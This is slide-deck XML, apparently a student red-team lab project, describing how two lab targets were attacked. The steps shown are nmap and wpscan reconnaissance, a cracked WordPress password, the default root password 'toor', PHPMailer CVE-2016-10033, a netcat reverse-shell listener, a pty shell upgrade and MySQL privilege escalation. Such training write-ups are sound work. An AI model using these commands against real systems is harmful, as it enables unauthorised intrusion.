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Fira Code"/>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Code-bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/FiraCod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b0deda8c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b0deda8c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a previous slide, we were able to simply guess the root password on the machine. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>oor is often a default password for the root account on some distributions of Linux, like for example Kali.”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9086d61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9086d61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9086d61d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9086d61d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d32f6170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d32f6170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9086d61d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9086d61d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9086d61d3_1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9086d61d3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d1e901e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d1e901e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d1e901e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d1e901e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d1e901e3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d1e901e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d1e901e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d1e901e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b0deda8c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b0deda8c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a5110b3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a5110b3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a5110b32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a5110b32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d32f617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d32f617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b0deda8c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b0deda8c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9086d61d3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9086d61d3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vulnerability in target one and two has poor password management. It was easily hacked into and password creation lacked complexity. Target 1 also stored MySQL credentials.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target two , the vulnerability is in CVE-2016-1033, the PHPMailer affects versions before 5.2.18 whichs allows attackers to pass extra parameters to the mail command and consequently execute code. Also privilege escalation is a MySQL 4/5/6 vulnerability that was used to gain a root shell.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were able to detect the password vulnerability by using John the Ripper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> T1 and T2.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b0deda8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b0deda8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b0deda8c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b0deda8c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9086d61d3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9086d61d3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an aggressive nmap scan on Target 1 reveals a large list of ports and services that are exposed. For this project’s purposes, we focused entirely the ssh service.”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c2611543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c2611543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running wpscan enumeration, we were able to discover the users steven and michael on the wordpress installation.”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b0deda8c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b0deda8c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9086d61d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9086d61d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mysql, we were able to locate the password hash for the user steven. We then used John the Ripper to crack the password, which was pink84. The next step was to login as steven and see what his permissions looked like”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9086d61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9086d61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the user steven has sudo access to /usr/bin/python, he can get root access, and therefore sudo access to the entire machine using a script that spawns a bash terminal.”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exploit-db.com/exploits/1518" TargetMode="Externa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hyperlink" Target="https://atom.hackstreetboys.ph/linux-privilege-escalation-service-explo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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>inal_project/</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>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6" name="Google Shape;56;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7458850" y="4743300"/>
            <a:ext cx="17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Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Cod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1987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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target1_Escalation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>BadPass.md</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="771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Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>$ whoami</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steven</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 su - root</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Password: toor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>root@target1$</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Cod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5" name="Shape 125"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Google Shape;126;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285950" y="238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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Recon/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>T2_Recon.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285950" y="81130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solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>nmap -sS -sV -sC -Pn -O 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Google Shape;128;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468200" y="1167600"/>
            <a:ext cx="6092250" cy="387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2" name="Shape 132"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228875" y="198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D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Recon/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>T2_wpscan.md</a:t>
            </a:r>
            <a:endParaRPr>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ct val="39285"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134" name="Google Shape;134;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311701" y="771475"/>
            <a:ext cx="3463250" cy="3894651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135" name="Google Shape;135;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3970688" y="1739850"/>
            <a:ext cx="4524375" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3837175" y="1216900"/>
            <a:ext cx="5034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Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>wpscan -e --url http://192.168.1.115/wordpress</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124300" y="1437425"/>
            <a:ext cx="37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1" name="Shape 141"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235500" y="189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rgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>CVE-2016-10033.md</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3698900" y="1017725"/>
            <a:ext cx="5133300" cy="272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latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>We gain access to a GUI file directory that seems to have some of the main plugins this Apache server is hosting, including seemingly “To-do” files to update security over their PHPMailer software</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Google Shape;144;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311695" y="982775"/>
            <a:ext cx="3019282" cy="3991025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Google Shape;145;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3438975" y="3824700"/>
            <a:ext cx="5630350" cy="1149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9" name="Shape 149"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267275" y="90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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267288" y="8022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solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>CVE-2016-10033 is a PHPMailer is a vulnerability that affects versions 5.2.18 and before, the vulnerability takes advantage of by passing multiple parameters to the mail command server to the mail command and, to allow attackers to gain a remote shell to the machine. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="Google Shape;152;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282038" y="2237975"/>
            <a:ext cx="8491075" cy="2725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6" name="Shape 156"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248700" y="27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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Reverse_Shell</a:t>
            </a:r>
            <a:endParaRPr>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58" name="Google Shape;158;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1126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solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>nc -lnvp 4444</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>We can get a full shell with: python -c 'import pty;pty.spawn("/bin/bash")'</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>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solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="159" name="Google Shape;159;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="248700" y="2056850"/>
            <a:ext cx="7934325" cy="188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63" name="Shape 163"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="162875"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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Escalation</a:t>
            </a:r>
            <a:endParaRPr>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65" name="Google Shape;16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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2501971"/>
            <a:ext cx="4026075" cy="442350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6122550" y="986775"/>
            <a:ext cx="281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rgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6550100" y="1577150"/>
            <a:ext cx="11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9" name="Google Shape;169;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6723525" y="2501975"/>
            <a:ext cx="23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0" name="Google Shape;170;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7541925" y="1152475"/>
            <a:ext cx="53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1" name="Google Shape;171;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666450" y="3228700"/>
            <a:ext cx="781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Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>We can see that MySQL is running as root, and is running an outdated version of the software, which gives plenty of context to research</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="172" name="Google Shape;172;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="278975" y="888213"/>
            <a:ext cx="8404499" cy="1474525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Google Shape;173;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="278975" y="3905800"/>
            <a:ext cx="8482351" cy="10045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281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rgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
